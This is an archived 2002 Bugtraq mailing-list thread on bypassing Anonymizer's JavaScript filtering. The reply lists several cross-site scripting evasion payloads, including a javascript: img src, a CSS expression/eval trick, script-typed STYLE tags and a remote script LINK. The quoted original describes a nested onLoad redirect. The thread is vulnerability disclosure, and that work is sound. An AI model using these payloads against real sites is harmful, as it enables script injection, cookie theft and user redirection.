Re: Bypassing javascript filters - problem N3.

From: fozzyat_private
Date: Tue Apr 02 2002 - 07:48:23 PST

Next message: Cisco Systems Product Security Incident Response Team: "Cisco Security Advisory: Vulnerability in zlib library"

Previous message: Matthias Jordan: "SQL injection in PHPGroupware"
In reply to: Alexander K. Yezhov: "Bypassing javascript filters - problem N3."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello,

I took a quick look at it. This service seems to be vulnerable to several
known attacks against webmails.
I successfully injected unfiltered javascript into a web page browsed
through Anonymizer using:

* <img aaa="bbb>" src="javascript:alert('beep');">  
(the original idea was published by Mark Slemko on vuln-dev, 23 Feb 2000...
but is still ignored on many webmails !)

* <P STYLE="left:expression(eval('alert(\'boop\')'))">  (thx to Guninski -
Bugtraq 1999)

* Some things that seems to work only with Netscape 4.x, like :
<STYLE TYPE="text/javascript">alert('biip');</style>
<STYLE TYPE="application/x-javascript">alert('burp');</style>
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="http://.../script.js">
(thx to Jeremiah Grossman - WhiteHatSec Aug 2001)

...and probably more !...

I wish good luck to Anonymizer, because I what they are trying to do is
very close to "malicious html filtering" in webmails, and it seems to be
really difficult for webmails site to setup good filters. I wish Anonymizer
will show the way to a good web privacy.

FozZy

Hackademy - Paris.
Hackerz Voice International Edition
http://www.dmpfrance.com

Alexander K. Yezhov écrit:

> Hello bugtraq,
> 
>   Title: Bypassing JavaScript filters
>   Service: Anonymizer, maybe similar services
> 
>   Description:
> 
>   Anonymizer  offers free and commercial services that allow to browse
>   web safely. Since JavaScript can be dangerous, all script blocks and
>   events are cut from html.
> 
>   Problem N3:
> 
>   Maybe  you  remember  the problem I've reported in 2001 - JavaScript
>   code  could  be  executed  after parsing the html by Anonymizer. The
>   same principle of "JavaScript inside JavaScript" gave me the working
>   example of redirecting Anonymizer users recently.
> 
>   Demo is available as Test N3 at
>   http://anon.free.anonymizer.com/http://tools-on.net/you.shtml
> 
>   The part of the code before parsing:
> 
>   onLoad="onLoad="document.cookie='rw=; expires=Thu, 01-Jan-1970
>   onLoad="location='unprotected_location';"
> 
>   The same code after parsing:
> 
>   onLoad="location='unprotected_location';"
>   
>   Errors  generated  for visitors without Anonymizer are suppressed by
>   window.onError handler.
> 
>   Problem status:
>   
>   Anonymizer has been contacted and patched already.
> 
> Best regards, Alexander                          
> 
> -----------------------------------------------------------------------
>          MCP+I, MCSE on Windows NT 4, MCSE on Windows 2000
>   http://leader.ru http://tools-on.net (Security & Privacy on the Net)
> -----------------------------------------------------------------------
>

Next message: Cisco Systems Product Security Incident Response Team: "Cisco Security Advisory: Vulnerability in zlib library"
Previous message: Matthias Jordan: "SQL injection in PHPGroupware"
In reply to: Alexander K. Yezhov: "Bypassing javascript filters - problem N3."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Apr 03 2002 - 16:55:08 PST